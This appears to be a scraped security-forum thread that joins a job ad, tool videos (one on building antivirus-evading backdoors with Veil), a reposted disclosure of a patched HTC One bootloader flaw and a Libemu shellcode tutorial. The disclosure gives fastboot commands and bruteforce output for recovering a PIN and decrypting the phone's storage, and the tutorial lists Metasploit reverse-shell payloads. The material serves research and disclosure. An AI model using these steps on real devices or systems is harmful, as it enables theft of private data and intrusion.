information technology related field An information security certification like CEH, ECSA, LPT, CCSP, CISSP, Security+ Experience with web application security assessment tools: HP Web Inspect, Qualys, Burp Suite Involved in security related Open Source projects and security groups Job Setting: The duties of this position will be performed at EA’s office in Bucharest. The candidate will be expected to work alone, around others, under minimal supervision and tight deadlines. Occasional travel will be required. *LI-ID1* It’s not easy building the world’s best digital playground. It’s hair-standing-on-end exhilarating. It’s down-in-the-trenches challenging. It’s stroke-of-brilliance-at-midnight creative. It’s you—taking risks, challenging yourself, pursuing ideas, changing the way millions of people do something they love: play. In an industry that’s changing every day, EA is positioned for growth thanks to smart business plans, strategic acquisitions, and most importantly, our creative people around the world who gather each day to unite the world through play. We take that last part very seriously, so if what you’re reading excites you as much as it does us, apply today. Pentru aplicare: http://careersearch.ea.com/ro/bucharest/it/jobid5649661-application-security-analyst-jobs Sau daca vreti sa ajung CV-ul direct pe unde trebuie, mi-l puteti da pe PM si il trimit eu mai departe.

Ok, acum se poate discuta altfel.

Lasati staff-ul. Lamuriti problema.

Basic Dynamic Analysis With Ida Pro And Windbg Description: In this video you will learn how to use IDA Pro and WinDBG for basic Dynamic Analysis. These tools are very powerful for reverse engineering process, Malware analysis, and finding the vulnerability. Source : - OpenSecurity Research Sursa: Basic Dynamic Analysis With Ida Pro And Windbg

Veil Framework - Create A Undetected Backdoor Description: In this video you will learn how to use Veil Framework for penetration testing. This is a very great solution for AV Evasion. Now a days our first challenge is to bypass AV and this framework is all about AV Evasion. Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions. https://www.veil-framework.com/framework/veil-evasion/ Sursa: Veil Framework - Create A Undetected Backdoor

Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password By cedric » Wednesday 23 July 2014, 11:50 - Forensics TL;DR This article deals with the presence of the « read_mmc » command in the HTC One phone. Our target phone had Android 4.2.2 and HBOOT 1.54.0000. This vulnerability has been reported to HTC in February 2014 and has been fixed with the Kit Kat (4.4.2) upgrade released in March 2014. Since then, HTC has told us it will be addressed into operators ROMs. We are happy to say that it has been patched in all of them except one. As a consequence, we have decided to release the information about it. The « read_emmc » command had already been disclosed in a previous article for the HTC Desire Z, released in 2011. This command allows an attacker with physical access to read the flash memory of the phone, and possibly get sensitive information such as SMS messages, contacts and so on. Furthermore, this command allows an attacker to bruteforce the PIN/passcode in an automatic way that would not be possible without it. It opens an additional breach against users that define easily-guessable PIN/passcodes (such as 4-digit PIN). It is often the case because this same PIN/passcode is also used to unlock the phone on a daily basis. Finally, the attack presented in this article also applies to HTC One devices where Full Disk Encryption (FDE) is enabled, i.e. when the phone is protected with Android encryption. The “read_mmc” command appears to be a debug function that is not on every HTC phone. In our opinion, this command should not appear in any released phone. This articles details the strong security mechanisms (AES encryption, correct key size, salt) used in Android FDE for the HTC One and the problematic context: the « read_mmc » debug command and a weak PIN/password allow an attacker to bruteforce it "offline" (from a computer) and access user protected data. Accessing the flash memory The HTC One is powered down and plugged to our computer. Then it is put in fastboot mode. This can be done by holding VOL DOWN + POWER buttons then releasing POWER while holding VOL DOWN. Then, we can switch from HBOOT to fastboot mode. From there, we can use the “fastboot” binary from Android SDK to read the flash memory. The command has the following format: command format: read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show] The arguments are defined as such: first parameter tells where to read from. “emmc” to read the flash. “sd” to read the sdcard start: offset (in blocks i.e. 512-byte units) in the raw flash memory #blocks: number of blocks to read #blocks/read: number of blocks to read at a time show: set to 1 to display the result An advised user may have noticed it is called "read_mmc" here instead of the older "read_emmc" command but its purpose is the same. To read the first sector, one can use the following command: $ fastboot oem read_mmc emmc 0 1 1 1 ... (bootloader) reading sector 0 ~ 0 (bootloader) 0 ... (bootloader) 0 (bootloader) DF (bootloader) FF (bootloader) 3 (bootloader) 0 (bootloader) 20 (bootloader) E0 (bootloader) 9F (bootloader) 3 (bootloader) 55 (bootloader) AA (bootloader) read sector done average = 172 OKAY [ 0.310s] finished. total time: 0.311s We can see it has lots of zeros at the beginning (more than 400 bytes) and it ends with the “55 AA” magic bytes, being the magic for a partition table. Using an ADB shell on the device, we see the userdata partition is the “mmcblk0p37” block device and starts at the 6422528th sector. It corresponds to the “ext4” mounted partition under Android. shell[COLOR=#000000][B]@[/B][/COLOR]android[COLOR=#666666][I]# cat /proc/emmc[/I][/COLOR] dev: [COLOR=#c20cb9][B]size[/B][/COLOR] erasesize name ... mmcblk0p37: [COLOR=#000000]680000000[/COLOR] 00000200 [COLOR=#ff0000]"userdata"[/COLOR] shell[COLOR=#000000][B]@[/B][/COLOR]android:[COLOR=#666666][I]# cat /sys/block/mmcblk0/mmcblk0p37/start[/I][/COLOR] [COLOR=#000000]6422528[/COLOR] shell[COLOR=#000000][B]@[/B][/COLOR]android:[COLOR=#666666][I]# mount[/I][/COLOR] ... [COLOR=#000000][B]/[/B][/COLOR]dev[COLOR=#000000][B]/[/B][/COLOR]block[COLOR=#000000][B]/[/B][/COLOR]mmcblk0p37 [COLOR=#000000][B]/[/B][/COLOR]data ext4 rw,nosuid,nodev,noatime,discard,noauto_da_alloc,[COLOR=#007800]data[/COLOR]=ordered [COLOR=#000000]0[/COLOR] [COLOR=#000000]0[/COLOR] Consequently, an attacker can use the “read_mmc” command and the previous offset (6422528 and after) in the flash memory to read any sector within the userdata partition even if the user defined a PIN/passcode to protect his phone. $ fastboot oem read_mmc emmc 6422530 1 1 1 ... (bootloader) reading sector 6422530 ~ 6422530 (bootloader) 0 ... (bootloader) 2F (bootloader) 64 (bootloader) 61 (bootloader) 74 (bootloader) 61 ... (bootloader) read sector done average = 146 OKAY [ 0.359s] finished. total time: 0.359s The “2F 64 61 74 61” sequence of bytes is the “/data” ascii string that is located at the beginning of the userdata partition. As we already detailed with the previous article, the first idea we got was to realize a dump of the whole userdata partition from the flash memory. However, it is really slow and it would take several days or even months. As a side note, the HTC One phone does not discharge when in HBOOT/fastboot modes and plugged to a computer. So it is theoretically “easier” to realize a whole dump as it was with the HTC Desire Z. Another approach is to use FUSE (Filesystem in Userspace) to mount the userdata partition remotely (over USB) from a computer. Mounting the partition only requires reading a few sectors and is significantly faster. We can then access any file. Indeed, this also works for the HTC One. Bypassing the Android Full Disk Encryption (FDE) When working on the HTC Desire Z, there was no “Full Disk Encryption” (FDE) option available because it was Android 2.x at that time and encryption is not supported before Android 4.x for mobile phones. We decided to analyze if there was a way to bypass FDE using the “read_mmc” vulnerability. Thomas Cannon has published back in 2012 at Defcon his excellent slides showing how FDE is working for default Android (based on Android source code, a.k.a AOSP) and scripts to both bruteforce the PIN/passcode and decrypt userdata sectors. At that time, he has been working on the Google Nexus S, which is a phone built by Google itself. Consequently, it uses the default Android sources and has not been modified by any manufacturer. This is different with our HTC One since this is HTC who built it from its own version of modified AOSP and hardware. We decided to encrypt the device by enabling it in “Storage > Phone storage encryption”. After dumping all the partitions and diffing them with a dump we made before encryption, we easily notice the “extra” partition is the FDE header used to store the encrypted master key. As detailed in Thomas slides, the PIN/passcode defined by the user is used in conjunction with the encrypted master key (between {...} below) and salt (between [...] below) to derive the decrypted master key. This decrypted master key is then used to decrypt each sector of the userdata partition. We can also infer from the header the algorithm used for the /data sector decryption (aes-cbc-essiv:sha256). $ hexdump -C extra 00000000 c4 b1 b5 d0 01 00 00 00 68 00 00 00 00 00 00 00 |........h.......| 00000010 20 00 00 00 00 00 00 00 00 00 40 03 00 00 00 00 | ........ @[URL="https://rstforums.com/forum/member.php?u=83354"].....[/URL]| 00000020 00 00 00 00 61 65 73 2d 63 62 63 2d 65 73 73 69 |....aes-cbc-essi| 00000030 76 3a 73 68 61 32 35 36 00 00 00 00 00 00 00 00 |v:sha256........| 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000060 00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c |.............T@.| 00000070 b4 c1 e4 91 69 10 4b 55 2e 47 64 31 13 52 ad 2d |....i.KU.Gd1.R.-| 00000080 bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00 |..B.............| 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000a0 00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39 |..........4....9| 000000b0 0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00 |.J..............| 000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000200 Note: for further details on the master key derivation and data decryption internals, we will definitely advise you to have a look at Thomas’ slides. Since we located where the encryption header is, we easily get the offset in the flash memory where it is stored. shell@android# cat /proc/emmc dev: size erasesize name ... mmcblk0p27: 00010000 00000200 "extra" shell@android:# cat /sys/block/mmcblk0/mmcblk0p27/start 586799 Then, we can double-check that our userdata partition is encrypted, as the first bytes amusingly tell it: “This is an encrypted device:)”. This is some kind of addition made by HTC for the HTC One specifically. They can do so because the first bytes are not used in a default ext4 partition. Everything else is random bytes, as expected. shell@android:# ./busybox hexdump -C /dev/block/mmcblk0p37 -n 64 00000000 54 68 69 73 20 69 73 20 61 6e 20 65 6e 63 72 79 |This is an encry| 00000010 70 74 65 64 20 64 65 76 69 63 65 3a 29 6f c3 a0 |pted device:)o..| 00000020 26 bc 76 ed a8 77 ef 6a 95 28 32 ab 24 ce 8d 58 |&.v..w.j.(2.$..X| 00000030 91 fe 8e 14 9e 81 05 a4 28 65 64 3c 1b e2 11 56 |........(ed<...V| 00000040 We can then check that we can access this header and the encrypted userdata partition from fastboot “read_mmc” command, which is indeed possible. $ fastboot oem read_mmc emmc 586799 1 1 1 From this, we can build a small script that will read the FDE header (located in the “extra” partition) and the first sector of the “userdata” partition and bruteforce them locally from our computer. [COLOR=#666666][I]# python bruteforce_htcone_over_reademmc.py[/I][/COLOR] oem read_mmc emmc 6422528 1 1 1 oem read_mmc emmc 586799 1 1 1 Footer File : extra Magic : 0xD0B5B1C4 Major Version : 1 Minor Version : 0 Footer Size : 104 bytes Flags : 0x00000000 Key Size : 256 bits Failed Decrypts: 0 Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400 Salt : 0xC71F34809709FD390B4A91D9D9D800CD [COLOR=#660033]----------------[/COLOR] Trying to Bruteforce Password... please [COLOR=#7a0874][B]wait[/B][/COLOR] Found PIN[COLOR=#000000][B]![/B][/COLOR]: 0000 Saving decrypted master key to 'keyfile' We can easily bruteforce any 4-digit PIN in a matter of minutes with a regular PC. This takes a little bit of time since the master key derivation needs 2000 iterations, but it is definitely possible. Additionally, we save the decrypted master key for further analysis. The PIN/passcode setup by the user is used for both: decrypting the phone when it is switched on (1) accessing the phone after a given delay during a regular day use (2) Even if the user wants to protect his phone with a complex PIN/password for (1), he will definitely want to use a simple one for (2) because he will use it a lot to access his phone. Consequently, the scenario of bruteforcing the PIN/passcode assuming that it is a 4-digit PIN (and not a complex one such as having digits and letters) makes sense. Moreover, encrypting one phone using schemes instead of PIN/password is not supported in Android for now. We can add that it would not help against bruteforce since the scheme is stored as a sequence of numbers that do not repeat. Mounting the userdata encrypted partition (remotely over USB) Since an attacker is able to bruteforce the PIN/passcode easily using what we explained above, he is able to switch on the phone normally and write the found PIN/passcode to bypass the lock screen. Then, he is able to enable ADB and dump everything he wants. We do not need to go further. However, as a need for completeness (and also because it is always interesting to know how to mount an encrypted userdata partition), we will detail how to do it. Basically, this consists of using cryptsetup (version >= 1.60 in order to support the plain type) specifying the “plain” type, the decryption algorithms (aes-cbc-essiv:sha256) and the “keyfile” holding our previously decrypted master key. [COLOR=#666666][I]# mkdir mnt[/I][/COLOR] [COLOR=#666666][I]# losetup /dev/loop0 userdata.img[/I][/COLOR] [COLOR=#666666][I]# cryptsetup –type plain open –c aes-cbc-essiv:sha256 –d keyfile /dev/loop0 userdata[/I][/COLOR] [COLOR=#666666][I]# mount /dev/mapper/userdata mnt[/I][/COLOR] In our case, we "even" can do it over USB using the “read_mmc” command. All the tools to replay these scenarios are released into our github repository. Again, we would like to thank HTC security team for their support and by patching this vulnerability in Kit Kat upgrade. Sursa: Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password - Sogeti ESEC Lab

Shellcode Detection and Emulation with Libemu Introduction Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/Honeypot systems for emulating the x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, analyze shellcode inside malicous .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article. The very first thing we can do is download Libemu via Git with the following command: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# git clone git://git.carnivore.it/libemu.git [/TD] [/TR] [/TABLE] If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 AnsiC code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it’s evident that about 50k lines of code has been written. The installation instructions can be found at [1], which is why we won’t describe them in this article. We can also install the Pylibemu, so we can interact with Libemu directly from Python. Creating the Shellcode Let’s create a simple text case with Metasploit to see how Libemu works. First, we have to create a shellcode with msfpayload, which is a command-line tool specifically built to generate and output various versions of shellcode. Let’s first present all Linux payloads by grepping for the “linux” keyword through msfpayload command output. # msfpayload -l 2>&1 | grep linux linux/armle/adduser Create a new user with UID 0 linux/armle/exec Execute an arbitrary command linux/armle/shell/bind_tcp Listen for a connection, dup2 socket in r12, then execve linux/armle/shell/reverse_tcp Connect back to the attacker, dup2 socket in r12, then execve linux/armle/shell_bind_tcp Connect to target and spawn a command shell linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc/shell_find_port Spawn a shell on an established connection linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc64/shell_find_port Spawn a shell on an established connection linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/exec Execute an arbitrary command linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/adduser Create a new user with UID 0 linux/x86/chmod Runs chmod on specified file with specified mode linux/x86/exec Execute an arbitrary command linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server linux/x86/meterpreter/bind_nonx_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server linux/x86/meterpreter/reverse_nonx_tcp Connect back to the attacker, Staged meterpreter server linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged) linux/x86/shell/bind_nonx_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged) linux/x86/shell/reverse_nonx_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute

Merita ascultat. "Ennnumereitor"